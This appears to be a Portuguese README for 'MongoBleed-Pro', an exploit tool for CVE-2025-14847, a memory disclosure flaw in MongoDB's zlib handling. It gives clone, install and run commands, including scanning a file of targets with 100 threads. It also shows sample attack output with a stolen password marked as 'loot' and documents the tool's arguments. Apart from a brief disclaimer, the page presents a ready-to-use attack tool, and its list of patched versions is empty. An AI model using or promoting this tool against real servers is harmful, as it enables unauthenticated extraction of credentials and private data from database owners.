
Ferramenta de exploração para CVE-2025-14847, uma vulnerabilidade de divulgação de memória no MongoDB, que permite a extração multithread de dados sensíveis e segredos de instâncias vulneráveis.
Ferramenta Avançada de Exploração de Vazamento de Memória do MongoDB
Continue Aprendendo | Continue Hackeando com Alexcyberx
MongoBleed-Pro é uma ferramenta avançada de exploração para CVE-2025-14847, uma vulnerabilidade crítica de divulgação de memória no tratamento da compressão zlib do MongoDB. Esta ferramenta permite que pesquisadores de segurança extraiam dados sensíveis de instâncias MongoDB vulneráveis.
Esta ferramenta destina-se somente a testes de segurança autorizados e fins educacionais. O acesso não autorizado a sistemas de computador é ilegal. Sempre obtenha autorização adequada antes de testar.
# Clone the repository
git clone https://github.com/alexcyberx/CVE-2025-14847_Expolit.git
cd CVE-2025-14847_Expolit
# Install dependencies
pip install -r requirements.txt
python3 mongobleed_pro.py
python3 mongobleed_pro.py --target 192.168.1.100
python3 mongobleed_pro.py --target 192.168.1.100:27018
python3 mongobleed_pro.py --file targets.txt
python3 mongobleed_pro.py --target 192.168.1.100 --threads 100 --min-offset 100 --max-offset 20000
╔══════════════════════════════════════════════════════════════╗
║ 💀 INITIATING MEMORY EXTRACTION SEQUENCE 💀 ║
╚══════════════════════════════════════════════════════════════╝
⚡ Target Acquired: 192.168.1.100:27017
✓ Port OPEN
☠️ VULNERABLE! Initiating attack...
◉ 0x0E31 │ nr_inactive_anon 134420\nnr_active_anon 110832...
☠️ LOOT ACQUIRED: 🔐 Password
→ admin_pass=SuperSecret123
╔══════════════════ EXTRACTION COMPLETE ══════════════════╗
║ 💾 Bytes Extracted: 125,847
║ 📦 Unique Fragments: 342
║ 🔑 Secrets Found: 5
╚══════════════════════════════════════════════════════════╝
| File | Description |
|---|---|
loot_<host>.txt | Segredos extraídos em formato legível |
dump_<host>.bin | Despejo de memória bruto para análise manual |
Se você é administrador do MongoDB, atualize para as versões corrigidas:
alexcyberx
Este projeto está licenciado sob a Licença MIT - consulte o arquivo LICENSE para obter detalhes.
Se você achou esta ferramenta útil, dê uma ⭐ no GitHub!
「 Continue Aprendendo | Continue Hackeando 」
Feito com ❤️ por alexcyberx
| Property | Details |
|---|
| CVE ID | CVE-2025-14847 |
| Tipo de Vulnerabilidade | Divulgação de Memória |
| Versões Afetadas | MongoDB < 8.0.10, < 7.3.6, < 7.0.19, < 6.0.23 |
| Causa Raiz | Leitura além do limite no buffer da descompressão zlib |
| Impacto | Vazamento remoto de memória sem autenticação |
| Argument | Description | Default |
|---|
--target | IP/URL do alvo | Prompt interativo |
--file | Arquivo com lista de alvos | Nenhum |
--threads | Número de threads | 50 |
--min-offset | Offset mínimo de memória | 20 |
--max-offset | Offset máximo de memória | 8192 |